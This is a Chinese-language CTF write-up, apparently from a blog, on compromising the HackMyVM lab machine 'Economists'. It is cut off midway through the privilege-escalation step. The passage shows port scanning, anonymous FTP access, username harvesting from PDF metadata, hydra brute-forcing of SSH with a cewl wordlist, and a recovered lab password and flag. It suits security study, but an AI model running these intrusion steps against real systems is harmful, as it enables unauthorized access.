{"id":563,"date":"2024-04-15T12:37:41","date_gmt":"2024-04-15T04:37:41","guid":{"rendered":"http:\/\/162.14.82.114\/?p=563"},"modified":"2024-04-15T12:37:41","modified_gmt":"2024-04-15T04:37:41","slug":"hmv-_-economists","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/563\/04\/15\/2024\/","title":{"rendered":"hmv[-_-]Economists"},"content":{"rendered":"<h1>Economists<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237698.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237698.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415115114912\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237699.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237699.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415120027365\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.200 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 192.168.0.200:80\nOpen 192.168.0.200:21\nOpen 192.168.0.200:22\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.0.143\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-rw-r--    1 1000     1000       173864 Sep 13  2023 Brochure-1.pdf\n| -rw-rw-r--    1 1000     1000       183931 Sep 13  2023 Brochure-2.pdf\n| -rw-rw-r--    1 1000     1000       465409 Sep 13  2023 Financial-infographics-poster.pdf\n| -rw-rw-r--    1 1000     1000       269546 Sep 13  2023 Gameboard-poster.pdf\n| -rw-rw-r--    1 1000     1000       126644 Sep 13  2023 Growth-timeline.pdf\n|_-rw-rw-r--    1 1000     1000      1170323 Sep 13  2023 Population-poster.pdf\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 d9:fe:dc:77:b8:fc:e6:4c:cf:15:29:a7:e7:21:a2:62 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCwXTk2hpk3kYCB9R\/x6h\/MZK0hZ2uK5iqjYUW7wyb6Rz\/a8UbYu5XMJ63fRg6wZ5u1NWSb9A6j0OBoSoh74drbY7saloYgDtALyCLaXiSxOt2Va4Px10H8xaAZeSLwz\/ZKiRHiyu4uh4B4Tf\/vFGDe4Np3cfcO2ftQYwhqGGVeaIbCFTDbnZBwOJ+Ezgj2yJOGBYEeYU+au7BogSulWABGdGr9XmxApVmTaPvinWe89vqkiyc3CZHDPbrJu02cYm3aJFVpcCGBIx6wZcx2gC8W2wS3iStOfg4SILPfyZKLU6g2d9VF1jVwGQoeAoMmZgxF7bmF1J9ZcYAhN8JmMfT2++D+aK+p4K2gz5KPZjIUO02RKdMOdzSIqN6K7yQMKjdKw7Ig+d9qvzn54hYKUbvpxcnHnw2IhPcBytW6pndDQhyZ0g5RAzSRlO1nvgt6QMmOTG1X\/3OOgtPbIH0DnDFMVcl5YEUM8c2ebng7gSSUJDnUOiTPPYTbpJsEgYGWbU=\n|   256 be:66:01:fb:d5:85:68:c7:25:94:b9:00:f9:cd:41:01 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIVUhM\/zlKMghGOQJ90nVnueTstnWLIWtn6ZH4zQDMqSM1vaX9Gtza7d2q0\/91uTSyU7yx9pyjR7qnQwJUjTQFw=\n|   256 18:b4:74:4f:f2:3c:b3:13:1a:24:13:46:5c:fa:40:72 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIkYALtXLPsg30ZKCJbTRKnegoETlYTzlda2oKygf\/cN\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-title: Home - Elite Economists\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/192.168.0.200 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.200\/images\/]\n\/css                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.200\/css\/]\n\/js                   (Status: 301) [Size: 311] [--&gt; http:\/\/192.168.0.200\/js\/]\n\/readme.txt           (Status: 200) [Size: 410]\n\/fonts                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.200\/fonts\/]\n\/server-status        (Status: 403) [Size: 278]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237701.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237701.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415120422554\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237702.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237702.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415120439109\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u627e\u5230\u4e00\u5904\u7591\u4f3cdns\u89e3\u6790\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237703.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237703.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415121048065\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<p>\u533f\u540d\u767b\u5f55ftp\u670d\u52a1\uff0c\u4e0b\u8f7d\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/economists]\n\u2514\u2500$ ftp 192.168.0.200\nConnected to 192.168.0.200.\n220 (vsFTPd 3.0.3)\nName (192.168.0.200:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||51645|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        119          4096 Sep 13  2023 .\ndrwxr-xr-x    2 0        119          4096 Sep 13  2023 ..\n-rw-rw-r--    1 1000     1000       173864 Sep 13  2023 Brochure-1.pdf\n-rw-rw-r--    1 1000     1000       183931 Sep 13  2023 Brochure-2.pdf\n-rw-rw-r--    1 1000     1000       465409 Sep 13  2023 Financial-infographics-poster.pdf\n-rw-rw-r--    1 1000     1000       269546 Sep 13  2023 Gameboard-poster.pdf\n-rw-rw-r--    1 1000     1000       126644 Sep 13  2023 Growth-timeline.pdf\n-rw-rw-r--    1 1000     1000      1170323 Sep 13  2023 Population-poster.pdf\n226 Directory send OK.\nftp&gt; get Brochure-1.pdf\nlocal: Brochure-1.pdf remote: Brochure-1.pdf\nftp: Can&#039;t access `Brochure-1.pdf&#039;: Permission denied\nftp&gt; get Brochure-2.pdf\nlocal: Brochure-2.pdf remote: Brochure-2.pdf\nftp: Can&#039;t access `Brochure-2.pdf&#039;: Permission denied\nftp&gt; get Financial-infographics-poster.pdf\nlocal: Financial-infographics-poster.pdf remote: Financial-infographics-poster.pdf\nftp: Can&#039;t access `Financial-infographics-poster.pdf&#039;: Permission denied\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/economists]\n\u2514\u2500$ sudo su\n[sudo] password for kali: \n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/economists]\n\u2514\u2500# ftp 192.168.0.200                                                                                                          \nConnected to 192.168.0.200.\n220 (vsFTPd 3.0.3)\nName (192.168.0.200:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||43149|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        119          4096 Sep 13  2023 .\ndrwxr-xr-x    2 0        119          4096 Sep 13  2023 ..\n-rw-rw-r--    1 1000     1000       173864 Sep 13  2023 Brochure-1.pdf\n-rw-rw-r--    1 1000     1000       183931 Sep 13  2023 Brochure-2.pdf\n-rw-rw-r--    1 1000     1000       465409 Sep 13  2023 Financial-infographics-poster.pdf\n-rw-rw-r--    1 1000     1000       269546 Sep 13  2023 Gameboard-poster.pdf\n-rw-rw-r--    1 1000     1000       126644 Sep 13  2023 Growth-timeline.pdf\n-rw-rw-r--    1 1000     1000      1170323 Sep 13  2023 Population-poster.pdf\n226 Directory send OK.\nftp&gt; get Brochure-1.pdf\nlocal: Brochure-1.pdf remote: Brochure-1.pdf\n229 Entering Extended Passive Mode (|||13946|)\n150 Opening BINARY mode data connection for Brochure-1.pdf (173864 bytes).\n100% |*************************************************************************|   169 KiB    3.23 MiB\/s    00:00 ETA\n226 Transfer complete.\n173864 bytes received in 00:00 (3.20 MiB\/s)\nftp&gt; get Brochure-2.pdf\nlocal: Brochure-2.pdf remote: Brochure-2.pdf\n229 Entering Extended Passive Mode (|||48509|)\n150 Opening BINARY mode data connection for Brochure-2.pdf (183931 bytes).\n100% |*************************************************************************|  179 KiB    8.86 MiB\/s    00:00 ETA\n226 Transfer complete.\n183931 bytes received in 00:00 (8.70 MiB\/s)\nftp&gt; get Financial-infographics-poster.pdf\nlocal: Financial-infographics-poster.pdf remote: Financial-infographics-poster.pdf\n229 Entering Extended Passive Mode (|||11366|)\n150 Opening BINARY mode data connection for Financial-infographics-poster.pdf (465409 bytes).\n100% |*************************************************************************|   454 KiB   14.88 MiB\/s    00:00 ETA\n226 Transfer complete.\n465409 bytes received in 00:00 (14.42 MiB\/s)\nftp&gt; get Gameboard-poster.pdf\nlocal: Gameboard-poster.pdf remote: Gameboard-poster.pdf\n229 Entering Extended Passive Mode (|||52071|)\n150 Opening BINARY mode data connection for Gameboard-poster.pdf (269546 bytes).\n100% |*************************************************************************|   263 KiB    9.43 MiB\/s    00:00 ETA\n226 Transfer complete.\n269546 bytes received in 00:00 (9.08 MiB\/s)\nftp&gt; get Growth-timeline.pdf\nlocal: Growth-timeline.pdf remote: Growth-timeline.pdf\n229 Entering Extended Passive Mode (|||36660|)\n150 Opening BINARY mode data connection for Growth-timeline.pdf (126644 bytes).\n100% |*************************************************************************|   123 KiB    5.56 MiB\/s    00:00 ETA\n226 Transfer complete.\n126644 bytes received in 00:00 (5.42 MiB\/s)\nftp&gt; get Population-poster.pdf\nlocal: Population-poster.pdf remote: Population-poster.pdf\n229 Entering Extended Passive Mode (|||32397|)\n150 Opening BINARY mode data connection for Population-poster.pdf (1170323 bytes).\n100% |*************************************************************************|  1142 KiB   19.79 MiB\/s    00:00 ETA\n226 Transfer complete.\n1170323 bytes received in 00:00 (19.67 MiB\/s)\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/economists]\n\u2514\u2500# exiftool Brochure-1.pdf     \nExifTool Version Number         : 12.76\nFile Name                       : Brochure-1.pdf\nDirectory                       : .\nFile Size                       : 174 kB\nFile Modification Date\/Time     : 2023:09:13 00:00:00-04:00\nFile Access Date\/Time           : 2024:04:15 00:18:41-04:00\nFile Inode Change Date\/Time     : 2024:04:15 00:17:36-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PDF\nFile Type Extension             : pdf\nMIME Type                       : application\/pdf\nPDF Version                     : 1.6\nLinearized                      : No\nPage Count                      : 2\nXMP Toolkit                     : Image::ExifTool 12.40\nSubject                         : We are here for your wealth\nTitle                           : Elite Economists brochure 1\nAuthor                          : joseph\nCreator                         : Impress\nProducer                        : LibreOffice 7.3\nCreate Date                     : 2023:09:13 12:03:17+02:00<\/code><\/pre>\n<p>\u5c06\u6240\u6709\u6587\u4ef6\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">exiftool *.pdf | grep Author<\/code><\/pre>\n<pre><code class=\"language-text\">Author                          : joseph\nAuthor                          : richard\nAuthor                          : crystal\nAuthor                          : catherine\nAuthor                          : catherine<\/code><\/pre>\n<p>\u5f97\u5230\u4e00\u4efd\u540d\u5355\uff1a<\/p>\n<pre><code class=\"language-apl\">joseph\nrichard\ncrystal\ncatherine<\/code><\/pre>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.200\/readme.txt<\/code><\/pre>\n<pre><code class=\"language-text\">Thank you for using our template!\n\nFor more awesome templates please visit https:\/\/colorlib.com\/wp\/templates\/\n\nCopyright information for the template can&#039;t be altered\/removed unless you purchase a license.\nMore information about the license is available here: https:\/\/colorlib.com\/wp\/licence\/\n\nRemoving copyright information without the license will result in suspension of your hosting and\/or domain name(s).<\/code><\/pre>\n<p>\u5230\u5904\u70b9\u70b9\uff0c\u6ca1\u6709\u53d1\u73b0\u5565\u4e1c\u897f\u3002<\/p>\n<h3>\u7206\u7834ssh<\/h3>\n<p>\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff0c\u672a\u679c\uff08\u6ca1\u8fd0\u884c\u5b8c\uff0c\u4f46\u662f\u4e00\u76f4\u4e0d\u51fa\uff09<\/p>\n<p>\u5c1d\u8bd5cewl\u4e00\u4e0b\uff0c\u751f\u6210\u4e00\u4e2a\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/economists]\n\u2514\u2500# cewl -d 2 -m 5 -w pass.txt http:\/\/192.168.0.200\nCeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https:\/\/digi.ninja\/)<\/code><\/pre>\n<p>\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">hydra -L user.txt -P pass.txt ssh:\/\/192.168.0.200 -t 64<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237704.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237704.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415123101646\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>ssh\u767b\u5f55<\/h3>\n<pre><code class=\"language-apl\">joseph\nwealthiest<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237705.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404151237705.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415123228880\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) joseph@elite-economists:\/home\/joseph$ whoami;id\njoseph\nuid=1001(joseph) gid=1001(joseph) groups=1001(joseph)\n(remote) joseph@elite-economists:\/home\/joseph$ ls -la\ntotal 32\ndrwxr-xr-x 4 joseph joseph 4096 Apr 15 04:30 .\ndrwxr-xr-x 6 root   root   4096 Sep 13  2023 ..\n-rw------- 1 joseph joseph    0 Sep 14  2023 .bash_history\n-rw-r--r-- 1 joseph joseph  220 Sep 13  2023 .bash_logout\n-rw-r--r-- 1 joseph joseph 3771 Sep 13  2023 .bashrc\ndrwx------ 2 joseph joseph 4096 Apr 15 04:30 .cache\ndrwxrwxr-x 3 joseph joseph 4096 Sep 13  2023 .local\n-rw-r--r-- 1 joseph joseph  807 Sep 13  2023 .profile\n-rw-rw-r-- 1 joseph joseph 3271 Sep 14  2023 user.txt\n(remote) joseph@elite-economists:\/home\/joseph$ cat user.txt \n\n                      ...................                 ....................                      \n                 .............................        .............................                 \n             ............              ...........     ......              ............             \n           ........                         ........                             ........           \n        ........              ...              ........           ....              .......         \n       ......                .....         ..     ......          .....                ......       \n     .............................        .....     ......        .............................     \n    ..............................       .....        .....       ..............................    \n                                        .....          .....                                        \n                                       .....            .....                                       \n                                      .....              .....                                      \n                                      .....              .....                                      \n                                     .....                ....                                      \n .................................................................................................. \n................................................................................................... \n                                     .....               .....                                      \n                                      .....              .....                                      \n                                      .....              .....                                      \n                                       .....            .....                                       \n                                        .....          .....                                        \n    ..............................       .....        .....       ..............................    \n     .............................        ......     .....        .............................     \n       ......                .....         .......     ..         .....                ......       \n        ........              ...            .......              ....              .......         \n           ........                            .........                         ........           \n             ...........               ......     ...........               ...........             \n                ..............................       ..............................                 \n                     .....................                ....................                      \n\nFlag: HMV{37q3p33CsMJgJQbrbYZMUFfTu}\n(remote) joseph@elite-economists:\/home\/joseph$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/snap\/core20\/2015\/usr\/bin\/chfn\n\/snap\/core20\/2015\/usr\/bin\/chsh\n\/snap\/core20\/2015\/usr\/bin\/gpasswd\n\/snap\/core20\/2015\/usr\/bin\/mount\n\/snap\/core20\/2015\/usr\/bin\/newgrp\n\/snap\/core20\/2015\/usr\/bin\/passwd\n\/snap\/core20\/2015\/usr\/bin\/su\n\/snap\/core20\/2015\/usr\/bin\/sudo\n\/snap\/core20\/2015\/usr\/bin\/umount\n\/snap\/core20\/2015\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2015\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1828\/usr\/bin\/chfn\n\/snap\/core20\/1828\/usr\/bin\/chsh\n\/snap\/core20\/1828\/usr\/bin\/gpasswd\n\/snap\/core20\/1828\/usr\/bin\/mount\n\/snap\/core20\/1828\/usr\/bin\/newgrp\n\/snap\/core20\/1828\/usr\/bin\/passwd\n\/snap\/core20\/1828\/usr\/bin\/su\n\/snap\/core20\/1828\/usr\/bin\/sudo\n\/snap\/core20\/1828\/usr\/bin\/umount\n\/snap\/core20\/1828\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1828\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/20092\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/18357\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/passwd\n\/usr\/bin\/pkexec\n\/usr\/bin\/umount\n\/usr\/bin\/at\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/fusermount\n(remote) joseph@elite-economists:\/home\/joseph$ sudo -l\nMatching Defaults entries for joseph on elite-economists:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser joseph may run the following commands on elite-economists:\n    (ALL) NOPASSWD: \/usr\/bin\/systemctl status\n(remote) joseph@elite-economists:\/home\/joseph$ sudo \/usr\/bin\/systemctl status\n\u25cf elite-economists\n    State: running\n     Jobs: 0 queued\n   Failed: 0 units\n    Since: Mon 2024-04-15 03:59:24 UTC; 34min ago\n   CGroup: \/\n           \u251c\u2500user.slice \n           \u2502 \u2514\u2500user-1001.slice \n           \u2502   \u251c\u2500user@1001.service \u2026\n           \u2502   \u2502 \u2514\u2500init.scope \n           \u2502   \u2502   \u251c\u25001548 \/lib\/systemd\/systemd --user\n           \u2502   \u2502   \u2514\u25001551 (sd-pam)\n           \u2502   \u2514\u2500session-4.scope \n           \u2502     \u251c\u25001533 sshd: joseph [priv]\n           \u2502     \u251c\u25001634 sshd: joseph@pts\/0\n           \u2502     \u251c\u25001635 -bash\n           \u2502     \u251c\u25001704 sudo \/usr\/bin\/systemctl status\n           \u2502     \u251c\u25001705 \/usr\/bin\/systemctl status\n           \u2502     \u2514\u25001706 pager\n           \u251c\u2500init.scope \n           \u2502 \u2514\u25001 \/sbin\/init maybe-ubiquity\n           \u2514\u2500system.slice \n             \u251c\u2500apache2.service \n             \u2502 \u251c\u2500753 \/usr\/sbin\/apache2 -k start\n             \u2502 \u251c\u2500755 \/usr\/sbin\/apache2 -k start\n             \u2502 \u2514\u2500756 \/usr\/sbin\/apache2 -k start\n             \u251c\u2500systemd-networkd.service \n             \u2502 \u2514\u2500640 \/lib\/systemd\/systemd-networkd\n             \u251c\u2500systemd-udevd.service \n             \u2502 \u2514\u2500398 \/lib\/systemd\/systemd-udevd\n             \u251c\u2500cron.service \n             \u2502 \u2514\u2500658 \/usr\/sbin\/cron -f\n             \u251c\u2500polkit.service \n             \u2502 \u2514\u2500681 \/usr\/lib\/policykit-1\/polkitd --no-debug\n             \u251c\u2500networkd-dispatcher.service \n             \u2502 \u2514\u2500680 \/usr\/bin\/python3 \/usr\/bin\/networkd-dispatcher --run-startup-triggers\n             \u251c\u2500multipathd.service \n             \u2502 \u2514\u2500558 \/sbin\/multipathd -d -s\n             \u251c\u2500accounts-daemon.service \n             \u2502 \u2514\u2500654 \/usr\/lib\/accountsservice\/accounts-daemon\n             \u251c\u2500ModemManager.service \n             \u2502 \u2514\u2500730 \/usr\/sbin\/ModemManager\n             \u251c\u2500systemd-journald.service \n             \u2502 \u2514\u2500362 \/lib\/systemd\/systemd-journald<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u63d0\u6743<\/h3>\n<p>\u597d\u50cf\u53ef\u4ee5\u8f93\u5165\u547d\u4ee4\uff0c\u5c1d\u8bd5\u63d0\u6743\u4e00\u4e0b\uff1f\u548cvim\u4e00\u6837\u7684\u65b9\u6cd5\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) joseph@elite-economists:\/home\/joseph$ sudo \/usr\/bin\/systemctl status\n\u25cf elite-economists\n    State: running\n     Jobs: 0 queued\n   Failed: 0 units\n    Since: Mon 2024-04-15 03:59:24 UTC; 36min ago\n   CGroup: \/\n           \u251c\u2500user.slice \n           \u2502 \u2514\u2500user-1001.slice \n           \u2502   \u251c\u2500user@1001.service \u2026\n           \u2502   \u2502 \u2514\u2500init.scope \n           \u2502   \u2502   \u251c\u25001548 \/lib\/systemd\/systemd --user\n           \u2502   \u2502   \u2514\u25001551 (sd-pam)\n           \u2502   \u2514\u2500session-4.scope \n           \u2502     \u251c\u25001533 sshd: joseph [priv]\n           \u2502     \u251c\u25001634 sshd: joseph@pts\/0\n           \u2502     \u251c\u25001635 -bash\n           \u2502     \u251c\u25001712 sudo \/usr\/bin\/systemctl status\n           \u2502     \u251c\u25001713 \/usr\/bin\/systemctl status\n           \u2502     \u2514\u25001714 pager\n           